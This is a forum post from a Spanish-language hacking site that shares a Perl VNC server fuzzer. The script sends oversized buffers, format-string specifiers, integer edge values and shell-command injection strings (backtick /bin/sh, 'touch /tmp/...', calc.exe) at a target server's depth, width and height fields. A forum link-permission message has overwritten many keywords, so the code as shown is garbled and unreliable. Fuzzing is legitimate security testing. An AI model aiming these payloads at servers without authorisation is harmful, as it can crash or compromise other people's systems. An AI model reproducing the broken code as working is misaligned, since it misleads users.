comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

VNC Server Fuzzer

  • 0 Respuestas
  • 1131 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado @ed33x

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 27, 2011, 08:51:38 pm »
Código: Perl
  1. #!/usr/bin/perl
  2. # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
  3. # VNCrush - VNC Server Fuzzer
  4. # How many more elaborate names for fuzzing tools can I come up with? Short answer: the imagination is limitless :)
  5. # Some servers will throw out some of the fuzz strings, some won't ;)
  6.  
  7. use Net::VNC;
  8. use Getopt::Std;
  9.  
  10. # FUZZ DATA BEGIN HERE
  11. @overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
  12.        'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);
  13.  
  14. @fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
  15.               '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
  16.               '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
  17.               '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);
  18.  
  19. @numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
  20.               '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
  21.               '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
  22.               '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
  23.               '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');
  24.  
  25. @miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
  26.        'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
  27.        'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
  28.        'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
  29. # FUZZ DATA END HERE
  30.  
  31. getopts('t:p:', \%opts);
  32. $target = $opts{'t'};
  33. $password = $opts{'p'};
  34.  
  35. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($target))
  36. {
  37.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n VNCrush - VNC Server Fuzzer";
  38.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
  39.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n Usage: $0 -t <target> -p <password>\n\n";
  40.      No tienes permisos para ver links. Registrate o Entra con tu cuenta(0);
  41.  
  42. }
  43.  
  44.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n VNCrush - VNC Server Fuzzer";
  45.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
  46.  
  47.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\nFuzzing VNC Server @ $target/$password... GOOD LUCK!\n";
  48.  
  49. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  50. foreach(@overflows) { $fuzz = $_;
  51. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = depth/overflow]\n";
  52. $vnc = Net::VNC->new({hostname => $target, password => $password});
  53. $vnc->depth($fuzz);
  54. $vnc->login; }
  55. foreach(@fmtstring) { $fuzz = $_;
  56. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = depth/$fuzz]\n";
  57. $vnc = Net::VNC->new({hostname => $target, password => $password});
  58. $vnc->depth($fuzz);
  59. $vnc->login; }
  60. foreach(@numbers) { $fuzz = $_;
  61. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = depth/$fuzz]\n";
  62. $vnc = Net::VNC->new({hostname => $target, password => $password});
  63. $vnc->depth($fuzz);
  64. $vnc->login; }
  65. foreach(@miscbugs) { $fuzz = $_;
  66. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = depth/$fuzz]\n";
  67. $vnc = Net::VNC->new({hostname => $target, password => $password});
  68. $vnc->depth($fuzz);
  69. $vnc->login; }
  70.  
  71. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  72. foreach(@overflows) { $fuzz = $_;
  73. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = width/overflow]\n";
  74. $vnc = Net::VNC->new({hostname => $target, password => $password});
  75. $vnc->depth(24);
  76. $vnc->width($fuzz);
  77. $vnc->login; }
  78. foreach(@fmtstring) { $fuzz = $_;
  79. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = width/$fuzz]\n";
  80. $vnc = Net::VNC->new({hostname => $target, password => $password});
  81. $vnc->depth(24);
  82. $vnc->width($fuzz);
  83. $vnc->login; }
  84. foreach(@numbers) { $fuzz = $_;
  85. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = width/$fuzz]\n";
  86. $vnc = Net::VNC->new({hostname => $target, password => $password});
  87. $vnc->depth(24);
  88. $vnc->width($fuzz);
  89. $vnc->login; }
  90. foreach(@miscbugs) { $fuzz = $_;
  91. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = width/$fuzz]\n";
  92. $vnc = Net::VNC->new({hostname => $target, password => $password});
  93. $vnc->depth(24);
  94. $vnc->width($fuzz);
  95. $vnc->login; }
  96.  
  97. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  98. foreach(@overflows) { $fuzz = $_;
  99. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = height/overflow]\n";
  100. $vnc = Net::VNC->new({hostname => $target, password => $password});
  101. $vnc->depth(24);
  102. $vnc->height($fuzz);
  103. $vnc->login; }
  104. foreach(@fmtstring) { $fuzz = $_;
  105. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = height/$fuzz]\n";
  106. $vnc = Net::VNC->new({hostname => $target, password => $password});
  107. $vnc->depth(24);
  108. $vnc->height($fuzz);
  109. $vnc->login; }
  110. foreach(@numbers) { $fuzz = $_;
  111. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = height/$fuzz]\n";
  112. $vnc = Net::VNC->new({hostname => $target, password => $password});
  113. $vnc->depth(24);
  114. $vnc->height($fuzz);
  115. $vnc->login; }
  116. foreach(@miscbugs) { $fuzz = $_;
  117. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Target = $target] [Fuzz = height/$fuzz]\n";
  118. $vnc = Net::VNC->new({hostname => $target, password => $password});
  119. $vnc->depth(24);
  120. $vnc->height($fuzz);
  121. $vnc->login; }
  122.  
  123.      No tienes permisos para ver links. Registrate o Entra con tu cuenta "\nFuzzing Complete. No faults? Try another server!\n\n";
  124.  
  125. No tienes permisos para ver links. Registrate o Entra con tu cuenta;
« Última modificación: Marzo 14, 2015, 09:55:04 am por Expermicid »
Me cambie de messenger ahora es: edeex@live.comNo tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Information Server

Iniciado por ProcessKill

Respuestas: 0
Vistas: 1103
Último mensaje Febrero 24, 2010, 04:35:09 pm
por ProcessKill
RSH Fuzzer

Iniciado por @ed33x

Respuestas: 0
Vistas: 1166
Último mensaje Enero 27, 2011, 08:51:20 pm
por @ed33x